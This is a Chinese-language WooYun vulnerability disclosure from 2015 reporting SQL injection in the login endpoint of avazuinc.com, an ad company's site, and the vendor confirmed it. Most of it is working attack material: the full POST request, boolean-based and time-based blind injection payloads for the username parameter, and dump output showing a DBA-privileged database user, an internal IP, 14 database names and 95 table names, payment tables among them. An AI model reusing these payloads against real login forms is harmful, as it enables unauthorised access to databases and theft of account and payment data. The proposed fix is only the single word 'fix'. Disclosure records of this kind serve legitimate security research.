当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127438

漏洞标题:Avazu艾维邑动主站SQL注射全站数据库DBA权限

相关厂商:avazuinc.com

漏洞作者: 路人甲

提交时间:2015-07-19 17:35

修复时间:2015-09-03 21:32

公开时间:2015-09-03 21:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-19: 细节已通知厂商并且等待厂商处理中
2015-07-20: 厂商已经确认,细节仅向厂商公开
2015-07-30: 细节向核心白帽子及相关领域专家公开
2015-08-09: 细节向普通白帽子公开
2015-08-19: 细节向实习白帽子公开
2015-09-03: 细节向公众公开

简要描述:

#No wall#

详细说明:

 WooYun: Avazu艾维邑动敏感信息泄露漏洞打包(涉及数据库信息以及PayPal信息) 
涉及数据库信息以及PayPal信息
登陆处注射
POST /application/mdsp_login.php HTTP/1.1
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://avazuinc.com/
Cookie: w_language=en; wordpress_test_cookie=WP+Cookie+check
Host: avazuinc.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
password=123456&username=wooyun

漏洞证明:

---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
Payload: password=123456&username=-8069" OR 2576=2576--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: password=123456&username=wooyun" AND (SELECT * FROM (SELECT(SLEEP(5)))ugss) AND "xiMh"="xiMh
---
web application technology: PHP 5.5.13
back-end DBMS: MySQL 5.0.12
current user: 'mdsp_admin@192.168.114.198'
current user is DBA: True
available databases [14]:
[*] information_schema
[*] mdsp_avazu_net
[*] mdsp_camp_site_budget
[*] mdsp_exchange_report
[*] mdsp_tracking_city
[*] mdsp_tracking_city_day
[*] mdsp_tracking_day
[*] mdsp_tracking_inventory
[*] mdsp_tracking_isp
[*] mdsp_tracking_isp_day
[*] mdsp_tracking_site
[*] mdsp_tracking_site_day
[*] mdsp_traffic_planning
[*] test
Database: mdsp_avazu_net
[95 tables]
+--------------------------------+
| account |
| advertiser_invitation |
| agency_serivcecost |
| agency_template |
| automate_logs |
| automate_rules |
| automate_target_logs |
| campaign |
| campaign_url_check |
| carrier_country |
| carrier_country_avazu |
| carrier_country_contact |
| city |
| creative |
| creative_lib |
| creative_native_ads |
| device |
| dict_browser |
| dict_device |
| dict_os |
| dict_publisher |
| dict_ua |
| double_click_email |
| email_log |
| geo_isp |
| geo_isp_new |
| inventory |
| inventory_publisher |
| inventory_site |
| login_log |
| network_account |
| notification |
| notification_closed |
| operation_log |
| operational_history |
| operational_history_detail |
| os |
| password_reset |
| payment_history |
| payment_order_log |
| payment_orders |
| payment_signup |
| publisher_account |
| publisher_site |
| referral |
| referral_amount_history |
| report_revenue |
| report_runlog |
| report_spending |
| report_spending_by_day |
| report_spending_inventory |
| report_spending_inventory_day |
| report_totalbids |
| spending_log |
| sub_account |
| target_adpos |
| target_browser |
| target_carriers |
| target_city |
| target_connection |
| target_dayparting |
| target_device |
| target_devicetype |
| target_geo |
| target_gps |
| target_inventory |
| target_inventory_transparency |
| target_inventory_type |
| target_isp |
| target_os |
| target_osv |
| target_publisher |
| target_site |
| tracking_adpos |
| tracking_browser |
| tracking_carriers |
| tracking_click |
| tracking_connection |
| tracking_conversion |
| tracking_conversion_invalid |
| tracking_device |
| tracking_devicetype |
| tracking_geo |
| tracking_inventory |
| tracking_inventorytransparency |
| tracking_inventorytype |
| tracking_os |
| tracking_osv |
| tracking_publisher |
| tracking_totalbids |
| tracking_totalbids_old |
| transfer_history |
| xero_contacts |
| xero_transactions |
| xero_transactions_new |
+--------------------------------+

修复方案:

fix

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-07-20 21:31

厂商回复:

确实有问题。

最新状态:

暂无


漏洞评价:

评论